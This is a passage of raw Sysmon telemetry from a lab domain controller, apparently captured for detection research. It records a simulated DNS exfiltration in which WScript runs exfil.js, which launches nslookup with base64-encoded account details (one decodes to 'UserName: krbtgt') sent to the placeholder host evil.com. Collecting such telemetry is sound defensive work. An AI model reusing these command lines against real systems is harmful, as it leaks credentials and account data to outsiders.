10341000x8000000000000000198106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-803F-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.759{2E1864BB-17B7-629A-7E3F-000000005F02}33967940C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-803F-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.769{2E1864BB-17B7-629A-803F-000000005F02}6560C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-7E3F-000000005F02}3396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlglznk.tmp 2>&1 10341000x8000000000000000198100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.743{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-7F3F-000000005F02}7864C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.743{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-7F3F-000000005F02}7864C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.728{2E1864BB-17B7-629A-7F3F-000000005F02}78647456C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-7E3F-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-7F3F-000000005F02}7864C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-7E3F-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-17A1-629A-783D-000000005F02}55528104C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-7E3F-000000005F02}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.722{2E1864BB-17B7-629A-7E3F-000000005F02}3396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlglznk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.712{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnim.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-17B7-629A-7C3F-000000005F02}39726928C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-7D3F-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-7D3F-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.696{2E1864BB-17B7-629A-7B3F-000000005F02}80724836C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-7D3F-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.697{2E1864BB-17B7-629A-7D3F-000000005F02}7260C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-7B3F-000000005F02}8072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnim.tmp 2>&1 22542200x8000000000000000198080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.820{00000000-0000-0000-0000-000000000000}5696evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.659{00000000-0000-0000-0000-000000000000}4996evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.435{00000000-0000-0000-0000-000000000000}7648evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.218{00000000-0000-0000-0000-000000000000}5580evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.091{00000000-0000-0000-0000-000000000000}4004evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000198075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.659{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-7C3F-000000005F02}3972C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.659{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-7C3F-000000005F02}3972C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.659{2E1864BB-17B7-629A-7C3F-000000005F02}39726928C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-7B3F-000000005F02}8072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.643{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-7C3F-000000005F02}3972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.628{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-7B3F-000000005F02}8072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 